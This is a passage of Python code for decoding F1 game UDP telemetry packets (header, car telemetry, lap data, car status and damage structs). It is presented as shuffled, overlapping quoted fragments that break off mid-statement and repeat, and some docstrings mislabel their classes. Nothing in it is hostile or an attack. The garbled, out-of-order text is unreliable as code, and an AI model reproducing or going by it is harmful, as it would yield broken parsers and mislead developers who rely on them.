from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class attributes.", ") car_telemetry_data_list.append(car_telemetry_data) return cls( packet_header, car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1], ) def get_player_car_data(self) ->", "self.m_header.m_player_car_index player_car_telemetry = self.m_car_telemetry_data[player_car_index] player_telemetry_message = ( self.m_header.__dict__ | player_car_telemetry.__dict__.copy() ) # Map", "list() for i in range(22): car_telemetry_data = CarTelemetryData.from_unpacked( unpacked_wo_header[ i * len(CAR_TELEMETRY_DATA_FORMAT) :", "def from_binary(cls, binary_message: str): \"\"\"Create class form binary UDP package. Args: binary_message (str):", "m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance: ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8 @classmethod def from_unpacked(cls,", "m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float] m_surface_type:", ") @dataclass class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\" m_header: PacketHeader m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player:", "PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" # Unpack struct unpacked", "self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy() ) return player_values @dataclass class CarStatusData: \"\"\"CarStatusData struct.\"\"\" m_fuelInTank: ctypes.c_float", "PacketHeader class. binary_message (str): Binary representation of struct. 
\"\"\" car_damage_data_list = cls.get_message_list( packet_header,", "car_damage_data_list = cls.get_message_list( packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData ) return cls(packet_header, car_damage_data_list) def get_player_car_data(self)", "ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear: ctypes.c_int8 @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create", "@dataclass class LapData: \"\"\"LapData struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16", "player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", ) ) player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return", "ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap: ctypes.c_float", "m_packet_id: ctypes.c_uint8 m_session_uid: ctypes.c_uint64 m_session_time: ctypes.c_float m_frame_identifier: ctypes.c_uint32 m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8 @classmethod", "packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. 
\"\"\" car_damage_data_list =", "PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\" m_header: PacketHeader m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear: ctypes.c_int8", "list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]), list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]), list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]), unpacked[22],", "to construct CarTelemetryData class. \"\"\" return cls( list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]), list([unpacked[4], unpacked[5],", "@dataclass class CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\" m_speed: ctypes.c_uint16 m_throttle: ctypes.c_float m_steer: ctypes.c_float m_brake: ctypes.c_float", "List PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\" CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\"", "Get lap data for each active car data_list = list() for i in", "# Map tyres pressure values from list to attributes player_telemetry_message = ( player_telemetry_message", "from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", )", "\"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_telemetry = self.m_car_telemetry_data[player_car_index] player_telemetry_message =", "player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", ) ) player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message @dataclass class LapData: \"\"\"LapData struct.\"\"\"", ") ) player_car_damage_message.pop(\"m_tyresDamage\") # Map brake damage values from list to attributes player_car_damage_message", 
"message_format: str, message_type: object, ): \"\"\"Create class form binary UDP package. Args: packet_header", "struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(message_format * 22), binary_message, ) # Remove", "player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_damage = self.m_carDamageData[player_car_index] player_car_damage_message = ( self.m_header.__dict__ |", "\"\".join(CAR_TELEMETRY_DATA_FORMAT * 22) + PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, ) # Remove header from struct unpacked_wo_header", "cls( list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]), list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]), list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]),", "| player_car_damage.__dict__.copy() ) # Map tyre wear values from list to attributes player_car_damage_message", "player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", ) ) player_car_damage_message.pop(\"m_tyresWear\") # Map tyre damage values from list to", "unpacked[20], unpacked[21], ) @dataclass class PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData: List[CarStatusData] @classmethod def from_binary(cls,", "player_values @dataclass class CarStatusData: \"\"\"CarStatusData struct.\"\"\" m_fuelInTank: ctypes.c_float m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound:", "to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", ) ) player_car_damage_message.pop(\"m_tyresDamage\")", "player_car_damage.__dict__.copy() ) # Map tyre wear values from list to attributes player_car_damage_message =", "car_telemetry_data = CarTelemetryData.from_unpacked( unpacked_wo_header[ i * len(CAR_TELEMETRY_DATA_FORMAT) : (i + 1) * len(CAR_TELEMETRY_DATA_FORMAT)", "be mapped to attributes. 
attribute_name(str): Attribute name used as keys in dict. \"\"\"", "PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, ) # Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :]", "values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\",", "\"\"\" return cls( list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]), list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]), list([unpacked[8], unpacked[9],", "packet_header: PacketHeader, binary_message: str, message_format: str, message_type: object, ): \"\"\"Create class form binary", "player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map tyre inner temperature values from list to attributes player_telemetry_message =", "= self.m_carDamageData[player_car_index] player_car_damage_message = ( self.m_header.__dict__ | player_car_damage.__dict__.copy() ) # Map tyre wear", "list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]), list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]), ) @dataclass class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData", ") ) player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message @dataclass class LapData: \"\"\"LapData struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32", "= cls.get_message_list( packet_header, binary_message, LAP_DATA_FORMAT, LapData ) return cls(packet_header, lap_data_list) def get_player_car_data(self) ->", "attributes from attributes list and allocate to position on car (fl, fr, rl,", "\"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values: list, attribute_name: str) -> dict: \"\"\"Get single attributes from attributes", "binary_message (str): Binary representation of struct. 
\"\"\" # Unpack struct unpacked = struct.unpack_from(", "player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", ) ) player_car_damage_message.pop(\"m_tyresWear\") # Map", "unpacked[15], unpacked[17], unpacked[18], unpacked[19], unpacked[20], unpacked[21], ) @dataclass class PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData:", "unpacked[19], unpacked[20], unpacked[21]]), unpacked[22], list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]), list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]), )", "telemetry values that should be mapped to attributes. attribute_name(str): Attribute name used as", "m_packet_version: ctypes.c_uint8 m_packet_id: ctypes.c_uint8 m_session_uid: ctypes.c_uint64 m_session_time: ctypes.c_float m_frame_identifier: ctypes.c_uint32 m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index:", ": :] # Get telemetry for each active car car_telemetry_data_list = list() for", "representation of struct. \"\"\" # Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(message_format", "m_throttle: ctypes.c_float m_steer: ctypes.c_float m_brake: ctypes.c_float m_clutch: ctypes.c_uint8 m_gear: ctypes.c_int8 m_engine_rpm: ctypes.c_uint16 m_drs:", "return cls( packet_header, car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1], ) def get_player_car_data(self) -> dict: \"\"\"Get", "def get_message_list( cls, packet_header: PacketHeader, binary_message: str, message_format: str, message_type: object, ): \"\"\"Create", "binary_message (str): Binary representation of package header. 
\"\"\" format_string = \"<HBBBBQfLBB\" unpacked =", "data_list.append(data) return data_list @dataclass class CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\" m_speed: ctypes.c_uint16 m_throttle: ctypes.c_float m_steer:", "car_position_mapping[i] telemetry_values_dict[key_name] = telemetry_value return telemetry_values_dict @dataclass class PacketHeader: \"\"\"PacketHeader struct.\"\"\" m_packet_format: ctypes.c_uint16", "to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_inner_temperature\")", "List[LapData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary UDP", "struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT * 22) + PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, )", "unpacked[12], unpacked[13]]), list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]), list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]), unpacked[22], list([unpacked[23], unpacked[24],", "car_damage_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index", "= \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values: list, attribute_name: str) -> dict: \"\"\"Get single attributes from", "ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8 @classmethod def from_binary(cls, binary_message: str): \"\"\"Create class form binary UDP", "PACKET_HEADER_FORMAT + \"\".join(message_format * 22), binary_message, ) # Remove header from struct unpacked_wo_header", "\"\"\" car_status_data_list = cls.get_message_list( packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData ) return cls(packet_header, car_status_data_list) def", "unpacked_wo_header[-3], 
unpacked_wo_header[-2], unpacked_wo_header[-1], ) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\"", "dataclasses import dataclass, asdict from typing import List PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT =", "= unpacked[len(asdict(packet_header)) : :] # Get lap data for each active car data_list", "data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy()", "list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", ) )", "return data_list @dataclass class CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\" m_speed: ctypes.c_uint16 m_throttle: ctypes.c_float m_steer: ctypes.c_float", "CarDamageData: \"\"\"CarStatusData struct.\"\"\" m_tyresWear: ctypes.c_float m_tyresDamage: ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked:", "Map tyres pressure values from list to attributes player_telemetry_message = ( player_telemetry_message |", "list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]), ) @dataclass class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\" m_header: PacketHeader m_car_telemetry_data:", "ctypes.c_uint8 m_session_uid: ctypes.c_uint64 m_session_time: ctypes.c_float m_frame_identifier: ctypes.c_uint32 m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8 @classmethod def", "# Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT * 22) + PACKET_CAR_TELEMETRY_DATA_FORMAT,", "\"\"\" # Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(message_format * 22), binary_message,", "unpacked[13], unpacked[15], unpacked[17], unpacked[18], unpacked[19], unpacked[20], unpacked[21], ) @dataclass class 
PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\"", "ctypes.c_float m_clutch: ctypes.c_uint8 m_gear: ctypes.c_int8 m_engine_rpm: ctypes.c_uint16 m_drs: ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16", "from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get telemetry for each active", "to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_brakesDamage\"], \"m_brakesDamage\", ) ) player_car_damage_message.pop(\"m_brakesDamage\")", "(PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" car_damage_data_list = cls.get_message_list(", "= ( self.m_header.__dict__ | player_car_telemetry.__dict__.copy() ) # Map tyre temperature values from list", "unpacked[2], unpacked[3]]), list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]), list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]), ) @dataclass class", "i * len(CAR_TELEMETRY_DATA_FORMAT) : (i + 1) * len(CAR_TELEMETRY_DATA_FORMAT) ] ) car_telemetry_data_list.append(car_telemetry_data) return", "m_steer: ctypes.c_float m_brake: ctypes.c_float m_clutch: ctypes.c_uint8 m_gear: ctypes.c_int8 m_engine_rpm: ctypes.c_uint16 m_drs: ctypes.c_uint8 m_rev_lights_percent:", "return player_values @dataclass class CarDamageData: \"\"\"CarStatusData struct.\"\"\" m_tyresWear: ctypes.c_float m_tyresDamage: ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8", "player_car_damage_message = ( self.m_header.__dict__ | player_car_damage.__dict__.copy() ) # Map tyre wear values from", "ctypes.c_float m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float", "unpacked[19], unpacked[20], unpacked[21], ) @dataclass class 
PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData: List[CarStatusData] @classmethod def", "return cls(packet_header, lap_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index", "containing all attributes to construct CarTelemetryData class. \"\"\" return cls( list([unpacked[0], unpacked[1], unpacked[2],", ") player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message @dataclass class LapData: \"\"\"LapData struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS:", "@dataclass class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData: List[CarDamageData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message:", "telemetry. Classes parse data from binary format and extract player data.\"\"\" import struct", "telemetry_value in enumerate(telemetry_values): key_name = str(attribute_name) + \"_\" + car_position_mapping[i] telemetry_values_dict[key_name] = telemetry_value", "dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_telemetry = self.m_car_telemetry_data[player_car_index] player_telemetry_message", "telemetry_values_dict @dataclass class PacketHeader: \"\"\"PacketHeader struct.\"\"\" m_packet_format: ctypes.c_uint16 m_game_major_version: ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8 m_packet_version:", "List of telemetry values that should be mapped to attributes. attribute_name(str): Attribute name", ") data_list.append(data) return data_list @dataclass class CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\" m_speed: ctypes.c_uint16 m_throttle: ctypes.c_float", "construct CarTelemetryData class. 
\"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6],", "( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", ) ) player_car_damage_message.pop(\"m_tyresWear\") # Map tyre damage", "struct containing all attributes to construct CarTelemetryData class. \"\"\" return cls( unpacked[0], unpacked[1],", "in dict. \"\"\" car_position_mapping = [\"rl\", \"rr\", \"fl\", \"fr\"] telemetry_values_dict = {} for", "for i in range(22): car_telemetry_data = CarTelemetryData.from_unpacked( unpacked_wo_header[ i * len(CAR_TELEMETRY_DATA_FORMAT) : (i", "ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float]", "@classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary UDP package.", "lap data for each active car data_list = list() for i in range(22):", "str, message_type: object, ): \"\"\"Create class form binary UDP package. Args: packet_header (PacketHeader):", "attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_inner_temperature\") #", "unpacked[17], unpacked[18], unpacked[19], unpacked[20], unpacked[21], ) @dataclass class PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData: List[CarStatusData]", "on car (fl, fr, rl, rr). 
Args: telemetry_values(list): List of telemetry values that", "= struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(message_format * 22), binary_message, ) # Remove header from", "@dataclass class CarDamageData: \"\"\"CarStatusData struct.\"\"\" m_tyresWear: ctypes.c_float m_tyresDamage: ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8 @classmethod def", "temperature values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"],", "-> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = (", "| player_car_telemetry.__dict__.copy() ) # Map tyre temperature values from list to attributes player_telemetry_message", "unpacked[5], unpacked[6], unpacked[7], unpacked[13], unpacked[15], unpacked[17], unpacked[18], unpacked[19], unpacked[20], unpacked[21], ) @dataclass class", "Args: binary_message (str): Binary representation of package header. \"\"\" format_string = \"<HBBBBQfLBB\" unpacked", "PacketHeader: \"\"\"PacketHeader struct.\"\"\" m_packet_format: ctypes.c_uint16 m_game_major_version: ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8 m_packet_version: ctypes.c_uint8 m_packet_id: ctypes.c_uint8", "list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", ) )", "struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get lap data for each active", "List[CarStatusData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary UDP", "all attributes to construct CarTelemetryData class. 
\"\"\" return cls( list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]),", "binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData ) return cls(packet_header, car_damage_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data", "m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap: ctypes.c_float @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into", "unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]), list([unpacked[14],", "cls(packet_header, lap_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index =", "player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", ) ) player_car_damage_message.pop(\"m_tyresDamage\") # Map brake damage values", "key_name = str(attribute_name) + \"_\" + car_position_mapping[i] telemetry_values_dict[key_name] = telemetry_value return telemetry_values_dict @dataclass", "= self.m_header.m_player_car_index player_car_damage = self.m_carDamageData[player_car_index] player_car_damage_message = ( self.m_header.__dict__ | player_car_damage.__dict__.copy() ) #", "m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16 m_tyres_pressure:", "def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary UDP package. 
Args:", "ctypes.c_int8 @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary UDP", "m_drs: ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature:", ") ) player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map tyre inner temperature values from list to attributes", "-> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_damage = self.m_carDamageData[player_car_index]", "@classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class attributes. Args: unpacked", "= \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\" CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT =", ") return cls(packet_header, car_status_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\"", "binary UDP package. Args: binary_message (str): Binary representation of package header. 
\"\"\" format_string", "\"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values: list, attribute_name: str) -> dict: \"\"\"Get single", "struct import ctypes from dataclasses import dataclass, asdict from typing import List PACKET_HEADER_FORMAT", "asdict from typing import List PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\" CAR_TELEMETRY_DATA_FORMAT =", "= struct.unpack_from(format_string, binary_message) return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7],", "Get telemetry for each active car car_telemetry_data_list = list() for i in range(22):", "Map tyre wear values from list to attributes player_car_damage_message = ( player_car_damage_message |", "ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class attributes. Args:", "class LapData: \"\"\"LapData struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance:", "class CarDamageData: \"\"\"CarStatusData struct.\"\"\" m_tyresWear: ctypes.c_float m_tyresDamage: ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8 @classmethod def from_unpacked(cls,", "unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[8] ) @dataclass class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data:", "from typing import List PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\" CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\"", "ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8]", 
"unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], ) @dataclass class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\" m_header:", "| self.m_carStatusData[player_car_index].__dict__.copy() ) return player_values @dataclass class CarDamageData: \"\"\"CarStatusData struct.\"\"\" m_tyresWear: ctypes.c_float m_tyresDamage:", ": (i + 1) * len(CAR_TELEMETRY_DATA_FORMAT) ] ) car_telemetry_data_list.append(car_telemetry_data) return cls( packet_header, car_telemetry_data_list,", ") # Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get", "tyre temperature values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes(", "str) -> dict: \"\"\"Get single attributes from attributes list and allocate to position", "lap_data_list = cls.get_message_list( packet_header, binary_message, LAP_DATA_FORMAT, LapData ) return cls(packet_header, lap_data_list) def get_player_car_data(self)", "| self.m_lap_data[player_car_index].__dict__.copy() ) return player_values @dataclass class CarStatusData: \"\"\"CarStatusData struct.\"\"\" m_fuelInTank: ctypes.c_float m_fuelCapacity:", "unpacked[4], unpacked[8] ) @dataclass class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data: List[LapData] @classmethod def from_binary(cls,", "PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\" CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT", "of package header. \"\"\" format_string = \"<HBBBBQfLBB\" unpacked = struct.unpack_from(format_string, binary_message) return cls(", "str, message_format: str, message_type: object, ): \"\"\"Create class form binary UDP package. Args:", "(str): Binary representation of struct. 
\"\"\" lap_data_list = cls.get_message_list( packet_header, binary_message, LAP_DATA_FORMAT, LapData", "] ) car_telemetry_data_list.append(car_telemetry_data) return cls( packet_header, car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1], ) def get_player_car_data(self)", "header. \"\"\" format_string = \"<HBBBBQfLBB\" unpacked = struct.unpack_from(format_string, binary_message) return cls( unpacked[0], unpacked[1],", "unpacked[7], unpacked[8], unpacked[9], ) @dataclass class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\" m_header: PacketHeader @classmethod def", ") # Map tyre wear values from list to attributes player_car_damage_message = (", ") player_car_damage_message.pop(\"m_tyresDamage\") # Map brake damage values from list to attributes player_car_damage_message =", "data from binary format and extract player data.\"\"\" import struct import ctypes from", "unpacked[21], ) @dataclass class PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData: List[CarStatusData] @classmethod def from_binary(cls, packet_header:", "unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]), list([unpacked[14], unpacked[15], unpacked[16],", "of struct. \"\"\" lap_data_list = cls.get_message_list( packet_header, binary_message, LAP_DATA_FORMAT, LapData ) return cls(packet_header,", "22), binary_message, ) # Remove header from struct unpacked_wo_header = 